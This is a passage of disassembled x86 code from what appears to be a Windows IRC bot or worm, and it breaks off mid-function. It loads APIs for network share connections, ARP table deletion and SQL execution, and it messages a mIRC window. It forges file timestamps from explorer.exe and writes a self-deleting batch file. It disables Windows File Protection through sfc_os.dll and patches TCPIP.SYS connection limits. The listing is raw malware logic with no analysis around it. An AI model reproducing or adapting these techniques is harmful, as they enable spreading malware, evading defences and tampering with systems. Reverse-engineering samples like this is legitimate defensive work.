cmp dword_4C4758, ebx
jz short loc_408762
cmp dword_4C466C, ebx
jz short loc_408762
cmp dword_4C4678, ebx
jz short loc_408762
cmp eax, ebx
jnz short loc_40876C
jmp short loc_408762
; ---------------------------------------------------------------------------
loc_40875B: ; CODE XREF: sub_407D3E+932�j
call ebp ; RtlGetLastWin32Error
mov dword_4C4818, eax
loc_408762: ; CODE XREF: sub_407D3E+9CD�j
; sub_407D3E+9D5�j ...
mov dword_4C4814, 1
loc_40876C: ; CODE XREF: sub_407D3E+A19�j
push offset aDnsapi_dll ; "dnsapi.dll"
call dword_4190F0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4087A5
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_4C4774, eax
call esi ; GetProcAddress
cmp dword_4C4774, ebx
mov dword_4C46F4, eax
jz short loc_4087AC
cmp eax, ebx
jnz short loc_4087B6
jmp short loc_4087AC
; ---------------------------------------------------------------------------
loc_4087A5: ; CODE XREF: sub_407D3E+A3D�j
call ebp ; RtlGetLastWin32Error
mov dword_4C4820, eax
loc_4087AC: ; CODE XREF: sub_407D3E+A5F�j
; sub_407D3E+A65�j
mov dword_4C481C, 1
loc_4087B6: ; CODE XREF: sub_407D3E+A63�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call dword_4190F0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4087EF
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_4C469C, eax
call esi ; GetProcAddress
cmp dword_4C469C, ebx
mov dword_4C46FC, eax
jz short loc_4087F6
cmp eax, ebx
jnz short loc_408800
jmp short loc_4087F6
; ---------------------------------------------------------------------------
loc_4087EF: ; CODE XREF: sub_407D3E+A87�j
call ebp ; RtlGetLastWin32Error
mov dword_4C4828, eax
loc_4087F6: ; CODE XREF: sub_407D3E+AA9�j
; sub_407D3E+AAF�j
mov dword_4C4824, 1
loc_408800: ; CODE XREF: sub_407D3E+AAD�j
push offset aMpr_dll ; "mpr.dll"
call dword_4190F0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_408863
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_4C4730, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_4C47C4, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_4C4668, eax
call esi ; GetProcAddress
cmp dword_4C4730, ebx
mov dword_4C4620, eax
jz short loc_40886A
cmp dword_4C47C4, ebx
jz short loc_40886A
cmp dword_4C4668, ebx
jz short loc_40886A
cmp eax, ebx
jnz short loc_408874
jmp short loc_40886A
; ---------------------------------------------------------------------------
loc_408863: ; CODE XREF: sub_407D3E+AD1�j
call ebp ; RtlGetLastWin32Error
mov dword_4C4830, eax
loc_40886A: ; CODE XREF: sub_407D3E+B0D�j
; sub_407D3E+B15�j ...
mov dword_4C482C, 1
loc_408874: ; CODE XREF: sub_407D3E+B21�j
push offset aShell32_dll ; "shell32.dll"
call dword_4190F0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4088AD
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_4C4798, eax
call esi ; GetProcAddress
cmp dword_4C4798, ebx
mov dword_4C4660, eax
jz short loc_4088B4
cmp eax, ebx
jnz short loc_4088BE
jmp short loc_4088B4
; ---------------------------------------------------------------------------
loc_4088AD: ; CODE XREF: sub_407D3E+B45�j
call ebp ; RtlGetLastWin32Error
mov dword_4C4838, eax
loc_4088B4: ; CODE XREF: sub_407D3E+B67�j
; sub_407D3E+B6D�j
mov dword_4C4834, 1
loc_4088BE: ; CODE XREF: sub_407D3E+B6B�j
push offset aOdbc32_dll ; "odbc32.dll"
call dword_4190F0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40894B
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_4C477C, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_4C4644, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_4C4794, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_4C46B4, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_4C4740, eax
call esi ; GetProcAddress
cmp dword_4C477C, ebx
mov dword_4C4654, eax
jz short loc_408952
cmp dword_4C4644, ebx
jz short loc_408952
cmp dword_4C4794, ebx
jz short loc_408952
cmp dword_4C46B4, ebx
jz short loc_408952
cmp dword_4C4740, ebx
jz short loc_408952
cmp eax, ebx
jnz short loc_40895C
jmp short loc_408952
; ---------------------------------------------------------------------------
loc_40894B: ; CODE XREF: sub_407D3E+B8F�j
call ebp ; RtlGetLastWin32Error
mov dword_4C4840, eax
loc_408952: ; CODE XREF: sub_407D3E+BE5�j
; sub_407D3E+BED�j ...
mov dword_4C483C, 1
loc_40895C: ; CODE XREF: sub_407D3E+C09�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_407D3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408964 proc near ; CODE XREF: .text:0040B775�p
; sub_418041+A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_40E04D
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
inc eax
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul dbl_41B1E0
call sub_40E2E4
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_408964 endp
; =============== S U B R O U T I N E =======================================
sub_408995 proc near ; CODE XREF: sub_40198E+1FBC�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push esi
push edi
xor edi, edi
push edi
mov ebx, offset aMirc ; "mIRC"
push ebx
call dword_4191E4 ; FindWindowA
mov esi, eax
cmp esi, edi
mov [esp+10h+var_4], esi
jz short loc_408A17
push ebp
push ebx
push 1000h
push edi
push 4
push edi
push 0FFFFFFFFh
call dword_41912C ; CreateFileMappingA
push edi
push edi
push edi
mov ebx, eax
push 0F001Fh
push ebx
call dword_419128 ; MapViewOfFile
push [esp+14h+arg_0]
mov ebp, eax
push ebp
call sub_40D6BB
pop ecx
pop ecx
push edi
push 1
push 4C8h
push esi
mov esi, dword_4191E8
call esi ; SendMessageA
push edi
push 1
push 4C9h
push [esp+20h+var_4]
call esi ; SendMessageA
push ebp
call dword_419124 ; UnmapViewOfFile
push ebx
call dword_419064 ; CloseHandle
xor eax, eax
inc eax
pop ebp
jmp short loc_408A19
; ---------------------------------------------------------------------------
loc_408A17: ; CODE XREF: sub_408995+1B�j
xor eax, eax
loc_408A19: ; CODE XREF: sub_408995+80�j
pop edi
pop esi
pop ebx
pop ecx
retn
sub_408995 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A1E proc near ; CODE XREF: sub_40479E+BC�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
push 7D0h
xor ebx, ebx
lea eax, [ebp+var_7D0]
push ebx
push eax
call sub_40D7B0
mov esi, [ebp+arg_0]
push esi
call sub_40D630
xor edi, edi
inc edi
add esp, 10h
cmp eax, edi
jge short loc_408A56
or eax, 0FFFFFFFFh
jmp short loc_408ABD
; ---------------------------------------------------------------------------
loc_408A56: ; CODE XREF: sub_408A1E+31�j
xor ecx, ecx
cmp eax, ebx
mov [ebp+var_7D0], esi
jle short loc_408A77
loc_408A62: ; CODE XREF: sub_408A1E+57�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_408A6F
cmp dl, 0Dh
jnz short loc_408A72
loc_408A6F: ; CODE XREF: sub_408A1E+4A�j
mov [ecx+esi], bl
loc_408A72: ; CODE XREF: sub_408A1E+4F�j
inc ecx
cmp ecx, eax
jl short loc_408A62
loc_408A77: ; CODE XREF: sub_408A1E+42�j
xor edx, edx
cmp eax, ebx
jle short loc_408A9F
loc_408A7D: ; CODE XREF: sub_408A1E+7F�j
cmp [edx+esi], bl
jnz short loc_408A9A
lea ecx, [edx+esi+1]
cmp [ecx], bl
jz short loc_408A9A
cmp edi, 1F4h
jge short loc_408A9F
mov [ebp+edi*4+var_7D0], ecx
inc edi
loc_408A9A: ; CODE XREF: sub_408A1E+62�j
; sub_408A1E+6A�j
inc edx
cmp edx, eax
jl short loc_408A7D
loc_408A9F: ; CODE XREF: sub_408A1E+5D�j
; sub_408A1E+72�j
cmp [ebp+arg_4], ebx
jz short loc_408ABB
push 7D0h
lea eax, [ebp+var_7D0]
push eax
push [ebp+arg_4]
call sub_40E3A0
add esp, 0Ch
loc_408ABB: ; CODE XREF: sub_408A1E+84�j
mov eax, edi
loc_408ABD: ; CODE XREF: sub_408A1E+36�j
pop edi
pop esi
pop ebx
leave
retn
sub_408A1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AC2 proc near ; CODE XREF: sub_404BAB+28E�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
xor esi, esi
push esi
lea eax, [ebp+var_11C]
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_4C46B0
test eax, eax
jz short loc_408B63
push ebx
push edi
push esi
mov edi, 80h
push edi
push 3
push esi
mov esi, dword_4190E0
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_408B61
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call dword_419130 ; GetFileTime
push ebx
mov ebx, dword_419064
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_408B61
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call dword_419198 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_408B61: ; CODE XREF: sub_408AC2+51�j
; sub_408AC2+87�j
pop edi
pop ebx
loc_408B63: ; CODE XREF: sub_408AC2+28�j
pop esi
leave
retn
sub_408AC2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B66 proc near ; CODE XREF: sub_40198E:loc_402E8D�p
; sub_4056A2+41D�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_41E134, esi
push edi
jz short loc_408B82
push esi
call start
pop ecx
loc_408B82: ; CODE XREF: sub_408B66+13�j
call sub_40A9B3
lea eax, [ebp+var_764]
push eax
push 400h
call dword_4190A0 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_40D6BB
add esp, 0Ch
push esi
push esi
push 2
push esi
push esi
push 40000000h
lea eax, [ebp+var_260]
push eax
call dword_4190E0 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_408CE2
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_40D6BB
add esp, 0Ch
push esi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_764]
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call dword_4190DC ; WriteFile
push edi
call dword_419064 ; CloseHandle
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_40D7B0
push 44h
pop edi
push edi
lea eax, [ebp+var_58]
push esi
push eax
call sub_40D7B0
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
push edi
lea eax, [ebp+var_15C]
push eax
push esi
mov [ebp+var_4C], offset word_41994E
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call dword_419094 ; GetModuleHandleA
push eax
call dword_419090 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call dword_4190C4 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_408C8A
push 80h
lea eax, [ebp+var_15C]
push eax
call dword_419078 ; SetFileAttributesA
loc_408C8A: ; CODE XREF: sub_408B66+110�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_40D6BB
add esp, 10h
push edi
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_764]
push eax
call dword_419134 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
push esi
lea eax, [ebp+var_364]
push eax
push esi
call dword_41909C ; CreateProcessA
loc_408CE2: ; CODE XREF: sub_408B66+6A�j
pop edi
pop esi
leave
retn
sub_408B66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408CE6 proc near ; CODE XREF: sub_40198E+10DB�p
; sub_40198E+18FF�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
push eax
mov [ebp+var_4], eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_40D7B0
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_41922C ; getsockname
movzx eax, [ebp+var_D]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset dword_419868
mov esi, offset dword_4C4854
push esi
call sub_40D6BB
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_408CE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408D3F proc near ; CODE XREF: sub_40198E+1905�p
; sub_40198E+2791�p
var_30 = byte ptr -30h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
cmp [ebp+arg_0], 0
jz short loc_408D5E
push offset word_41994E
push [ebp+arg_0]
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_408D62
loc_408D5E: ; CODE XREF: sub_408D3F+A�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_408D62: ; CODE XREF: sub_408D3F+1D�j
push esi
push edi
push 20h
push [ebp+arg_0]
lea eax, [ebp+var_30]
push eax
call sub_40DB80
mov esi, offset a_ ; "."
lea eax, [ebp+var_30]
push esi
push eax
call sub_40E1DE
add esp, 14h
test eax, eax
mov [ebp+var_10], eax
jz loc_408E32
xor edi, edi
inc edi
loc_408D92: ; CODE XREF: sub_408D3F+6D�j
push esi
push 0
call sub_40E1DE
test eax, eax
pop ecx
pop ecx
mov [ebp+edi*4+var_10], eax
jz loc_408E32
inc edi
cmp edi, 4
jl short loc_408D92
mov esi, [ebp+var_10]
push offset a10 ; "10"
push esi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_408DC6
loc_408DC2: ; CODE XREF: sub_408D3F+A9�j
; sub_408D3F+CD�j ...
mov al, 1
jmp short loc_408E34
; ---------------------------------------------------------------------------
loc_408DC6: ; CODE XREF: sub_408D3F+81�j
push offset a172 ; "172"
push esi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_408DEA
push offset a16 ; "16"
push [ebp+var_C]
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_408DC2
loc_408DEA: ; CODE XREF: sub_408D3F+96�j
push offset a192 ; "192"
push esi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_408E0E
push offset a168 ; "168"
push [ebp+var_C]
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_408DC2
loc_408E0E: ; CODE XREF: sub_408D3F+BA�j
push offset a90 ; "90"
push esi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_408E32
push offset a0 ; "0"
push [ebp+var_C]
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_408DC2
loc_408E32: ; CODE XREF: sub_408D3F+4A�j
; sub_408D3F+63�j ...
xor al, al
loc_408E34: ; CODE XREF: sub_408D3F+85�j
pop edi
pop esi
leave
retn
sub_408D3F endp
; =============== S U B R O U T I N E =======================================
sub_408E38 proc near ; CODE XREF: sub_409FA5+7�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4C4704
cmp eax, 0FFFFFFFFh
jnz short locret_408E60
push [esp+arg_0]
call dword_4C46F0
test eax, eax
jnz short loc_408E59
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_408E59: ; CODE XREF: sub_408E38+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_408E60: ; CODE XREF: sub_408E38+D�j
retn
sub_408E38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_408E61 proc near ; CODE XREF: sub_404901+15A�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_80 = byte ptr -80h
push ebp
lea ebp, [esp-78h]
sub esp, 94h
lea eax, [ebp+78h+var_94]
push eax
mov [ebp+78h+var_94], 94h
call dword_419138 ; GetVersionExA
cmp [ebp+78h+var_90], 5
jnz short loc_408EA2
cmp [ebp+78h+var_8C], 1
jnz short loc_408EA2
lea eax, [ebp+78h+var_80]
push offset a2 ; "2"
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_408EA2
xor eax, eax
inc eax
jmp short loc_408EA4
; ---------------------------------------------------------------------------
loc_408EA2: ; CODE XREF: sub_408E61+20�j
; sub_408E61+26�j ...
xor eax, eax
loc_408EA4: ; CODE XREF: sub_408E61+3F�j
add ebp, 78h
leave
retn
sub_408E61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408EA9 proc near ; CODE XREF: sub_408EF0+C3�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push 100h
lea eax, [ebp+var_200]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call dword_41913C ; MultiByteToWideChar
push offset aSfc_os_dll ; "sfc_os.dll"
call dword_4190F0 ; LoadLibraryA
push 5
push eax
call dword_4190F8 ; GetProcAddress
push 0FFFFFFFFh
lea ecx, [ebp+var_200]
push ecx
push 0
call eax
leave
retn
sub_408EA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_408EF0 proc near ; DATA XREF: sub_404901+1F6�o
var_638 = dword ptr -638h
var_5B4 = byte ptr -5B4h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = byte ptr -1ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 5B4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 46h
mov esi, eax
pop ecx
lea edi, [ebp+74h+var_1B4]
rep movsd
xor esi, esi
inc esi
mov [eax+114h], esi
mov eax, offset dword_419388
mov [ebp+74h+var_58], eax
mov edx, offset dword_41B2F8
mov ecx, offset dword_41B2F4
mov [ebp+74h+var_4C], eax
mov [ebp+74h+var_48], eax
mov [ebp+74h+var_78], eax
mov [ebp+74h+var_6C], eax
mov [ebp+74h+var_68], eax
mov eax, offset dword_41B2F0
xor edi, edi
push esi
mov [ebp+74h+var_64], offset dword_41B2EC
mov [ebp+74h+var_60], offset dword_41B2E8
mov [ebp+74h+var_5C], offset dword_41B2E4
mov [ebp+74h+var_54], edx
mov [ebp+74h+var_50], ecx
mov [ebp+74h+var_84], offset dword_41B2E0
mov [ebp+74h+var_80], offset dword_41B2DC
mov [ebp+74h+var_7C], offset dword_41B2D8
mov [ebp+74h+var_74], edx
mov [ebp+74h+var_70], ecx
mov [ebp+74h+var_38], offset asc_41B2D4 ; ""
mov [ebp+74h+var_34], eax
mov [ebp+74h+var_44], offset aS_7 ; ""
mov [ebp+74h+var_40], offset aG ; "G"
mov [ebp+74h+var_3C], eax
mov [ebp+74h+var_8], edi
call sub_40E74F
mov [ebp+74h+var_C], eax
mov [ebp+74h+var_10], edi
mov [esp+5C4h+var_638], 7530h
call dword_419060 ; Sleep
lea eax, [ebp+74h+var_1AC]
push eax
call sub_408EA9
pop ecx
mov ebx, 80h
push ebx
lea eax, [ebp+74h+var_1AC]
push eax
call dword_419078 ; SetFileAttributesA
push edi
push ebx
push 3
push edi
push esi
push 80000000h
lea eax, [ebp+74h+var_1AC]
push eax
call dword_4190E0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+74h+arg_0], eax
jz short loc_409008
lea ecx, [ebp+74h+var_9C]
push ecx
lea ecx, [ebp+74h+var_8C]
push ecx
lea ecx, [ebp+74h+var_94]
push ecx
push eax
call dword_419130 ; GetFileTime
push [ebp+74h+arg_0]
call dword_419064 ; CloseHandle
loc_409008: ; CODE XREF: sub_408EF0+FA�j
lea eax, [ebp+74h+var_1AC]
push offset aRB ; "r+b"
push eax
call sub_40E8E4
cmp eax, edi
pop ecx
pop ecx
mov [ebp+74h+arg_0], eax
jnz short loc_40905A
push [ebp+74h+var_A8]
lea eax, [ebp+74h+var_5B4]
push offset aCanNotOpenTcpi ; "Can not open TCPIP.SYS, version %d."
push 400h
push eax
call sub_40DFEC
lea eax, [ebp+74h+var_5B4]
push eax
call sub_401648
push [ebp+74h+var_1B0]
call sub_40AADD
add esp, 18h
jmp loc_4093B4
; ---------------------------------------------------------------------------
loc_40905A: ; CODE XREF: sub_408EF0+130�j
mov eax, [ebp+74h+var_A8]
dec eax
jz loc_409262
dec eax
jz loc_4091A3
dec eax
jz loc_40910E
dec eax
jnz loc_409318
mov [ebp+74h+var_30], 130h
mov [ebp+74h+var_2C], 4F5A2h
mov [ebp+74h+var_4], edi
loc_40908A: ; CODE XREF: sub_408EF0+1D9�j
mov eax, [ebp+74h+var_4]
push edi
push [ebp+eax+74h+var_30]
push [ebp+74h+arg_0]
call sub_40ED7A
push [ebp+74h+arg_0]
push esi
push esi
push [ebp+74h+var_C]
call sub_40E94D
mov eax, [ebp+74h+var_4]
push esi
push [ebp+eax+74h+var_44]
push [ebp+74h+var_C]
call sub_40E0D0
add esp, 28h
test eax, eax
jnz short loc_4090C1
inc [ebp+74h+var_8]
loc_4090C1: ; CODE XREF: sub_408EF0+1CC�j
add [ebp+74h+var_4], 4
cmp [ebp+74h+var_4], 0Ch
jl short loc_40908A
cmp [ebp+74h+var_8], 3
jge loc_409318
mov [ebp+74h+var_10], esi
mov [ebp+74h+var_4], edi
loc_4090DB: ; CODE XREF: sub_408EF0+217�j
mov eax, [ebp+74h+var_4]
push edi
push [ebp+eax+74h+var_30]
push [ebp+74h+arg_0]
call sub_40ED7A
push [ebp+74h+arg_0]
mov eax, [ebp+74h+var_4]
push esi
push esi
push [ebp+eax+74h+var_44]
call sub_40EC73
add [ebp+74h+var_4], 4
add esp, 1Ch
cmp [ebp+74h+var_4], 0Ch
jl short loc_4090DB
jmp loc_409318
; ---------------------------------------------------------------------------
loc_40910E: ; CODE XREF: sub_408EF0+17C�j
mov [ebp+74h+var_30], 130h
mov [ebp+74h+var_2C], 4F322h
mov [ebp+74h+var_4], edi
loc_40911F: ; CODE XREF: sub_408EF0+26E�j
mov eax, [ebp+74h+var_4]
push edi
push [ebp+eax+74h+var_30]
push [ebp+74h+arg_0]
call sub_40ED7A
push [ebp+74h+arg_0]
push esi
push esi
push [ebp+74h+var_C]
call sub_40E94D
mov eax, [ebp+74h+var_4]
push esi
push [ebp+eax+74h+var_38]
push [ebp+74h+var_C]
call sub_40E0D0
add esp, 28h
test eax, eax
jnz short loc_409156
inc [ebp+74h+var_8]
loc_409156: ; CODE XREF: sub_408EF0+261�j
add [ebp+74h+var_4], 4
cmp [ebp+74h+var_4], 8
jl short loc_40911F
cmp [ebp+74h+var_8], 2
jge loc_409318
mov [ebp+74h+var_10], esi
mov [ebp+74h+var_4], edi
loc_409170: ; CODE XREF: sub_408EF0+2AC�j
mov eax, [ebp+74h+var_4]
push edi
push [ebp+eax+74h+var_30]
push [ebp+74h+arg_0]
call sub_40ED7A
push [ebp+74h+arg_0]
mov eax, [ebp+74h+var_4]
push esi
push esi
push [ebp+eax+74h+var_38]
call sub_40EC73
add [ebp+74h+var_4], 4
add esp, 1Ch
cmp [ebp+74h+var_4], 8
jl short loc_409170
jmp loc_409318
; ---------------------------------------------------------------------------
loc_4091A3: ; CODE XREF: sub_408EF0+175�j
mov [ebp+74h+var_30], 130h
mov [ebp+74h+var_2C], 131h
mov [ebp+74h+var_28], 132h
mov [ebp+74h+var_24], 133h
mov [ebp+74h+var_20], 4F5A2h
mov [ebp+74h+var_1C], 4F5A3h
mov [ebp+74h+var_18], 4F5A4h
mov [ebp+74h+var_14], 4F5A5h
mov [ebp+74h+var_4], edi
loc_4091DE: ; CODE XREF: sub_408EF0+32D�j
mov eax, [ebp+74h+var_4]
push edi
push [ebp+eax+74h+var_30]
push [ebp+74h+arg_0]
call sub_40ED7A
push [ebp+74h+arg_0]
push esi
push esi
push [ebp+74h+var_C]
call sub_40E94D
mov eax, [ebp+74h+var_4]
push esi
push [ebp+eax+74h+var_84]
push [ebp+74h+var_C]
call sub_40E0D0
add esp, 28h
test eax, eax
jnz short loc_409215
inc [ebp+74h+var_8]
loc_409215: ; CODE XREF: sub_408EF0+320�j
add [ebp+74h+var_4], 4
cmp [ebp+74h+var_4], 20h
jl short loc_4091DE
cmp [ebp+74h+var_8], 8
jge loc_409318
mov [ebp+74h+var_10], esi
mov [ebp+74h+var_4], edi
loc_40922F: ; CODE XREF: sub_408EF0+36B�j
mov eax, [ebp+74h+var_4]
push edi
push [ebp+eax+74h+var_30]
push [ebp+74h+arg_0]
call sub_40ED7A
push [ebp+74h+arg_0]
mov eax, [ebp+74h+var_4]
push esi
push esi
push [ebp+eax+74h+var_84]
call sub_40EC73
add [ebp+74h+var_4], 4
add esp, 1Ch
cmp [ebp+74h+var_4], 20h
jl short loc_40922F
jmp loc_409318
; ---------------------------------------------------------------------------
loc_409262: ; CODE XREF: sub_408EF0+16E�j
mov [ebp+74h+var_30], 130h
mov [ebp+74h+var_2C], 131h
mov [ebp+74h+var_28], 132h
mov [ebp+74h+var_24], 133h
mov [ebp+74h+var_20], 4F322h
mov [ebp+74h+var_1C], 4F323h
mov [ebp+74h+var_18], 4F324h
mov [ebp+74h+var_14], 4F325h
mov [ebp+74h+var_4], edi
loc_40929D: ; CODE XREF: sub_408EF0+3EC�j
mov eax, [ebp+74h+var_4]
push edi
push [ebp+eax+74h+var_30]
push [ebp+74h+arg_0]
call sub_40ED7A
push [ebp+74h+arg_0]
push esi
push esi
push [ebp+74h+var_C]
call sub_40E94D
mov eax, [ebp+74h+var_4]
push esi
push [ebp+eax+74h+var_64]
push [ebp+74h+var_C]
call sub_40E0D0
add esp, 28h
test eax, eax
jnz short loc_4092D4
inc [ebp+74h+var_8]
loc_4092D4: ; CODE XREF: sub_408EF0+3DF�j
add [ebp+74h+var_4], 4
cmp [ebp+74h+var_4], 20h
jl short loc_40929D
cmp [ebp+74h+var_8], 8
jge short loc_409318
mov [ebp+74h+var_10], esi
